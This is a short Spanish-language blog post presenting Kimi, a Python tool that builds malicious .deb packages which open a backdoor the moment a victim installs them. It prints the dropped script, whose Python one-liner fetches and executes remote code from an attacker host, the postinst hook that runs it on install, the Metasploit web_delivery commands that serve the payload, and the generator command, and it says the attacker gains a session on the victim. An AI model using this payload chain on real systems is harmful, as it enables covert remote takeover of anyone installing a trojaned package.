Kimi, un generador de paquetes .deb maliciosos

Kimi es un sencillo script escrito en Python para crear un paquete Debian que activará un backdoor en el mismo momento en que la víctima intente instalarlo. 


Lo que hace es desplegar un fichero bash en el directorio  “/usr/local/bin/”: 
 
 #!/bin/bash
python -c "import urllib2; r = urllib2.urlopen('http://192.168.0.102:8080/SecPatch'); exec(r.read());"  

que se ejecutará inmediatamente al ser llamado mediante el fichero postinst:

#!/bin/bash

chmod 2755 /usr/local/bin/prueba && /usr/local/bin/prueba 

Como veis, la llamada es hacia la máquina del atacante que hospeda un payload, que previamente generó un servidor mediante el módulo Web Delivery de Metasploit 

msf > use exploit/multi/script/web_delivery
 msf exploit(web_delivery) > set srvhost 192.168.0.102
 srvhost => 192.168.0.102
 msf exploit(web_delivery) > set uripath /SecPatch
 uripath => /SecPatch
 msf exploit(web_delivery) > set Lhost 192.168.0.102
 Lhost => 192.168.0.102
 msf exploit(web_delivery) > show options
 msf exploit(web_delivery) > exploit 

y generó el payload malicioso con:
 
sudo python kimi.py -n prueba -l 192.168.0.102 -V 1.0

Finalmente como podéis ver en la siguiente imagen, al instalar el paquete, el atacante obtendrá una sesión sobre la máquina de la víctima:


El proyecto fue hecho para integrarse con Venom Shellcode Generator 1.0.13, pero puede usarse de forma independiente y puede adaptarse para que funcione fácilmente con otro generador de payloads.

Se ha probado en:

- Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
- ParrotOS (Debian Jessie)
- Kali Rolling 2.0

El nombre de la tool proviene de Kimimaro de la serie Naruto
Proyecto: https://github.com/ChaitanyaHaritash/kimi

Comentarios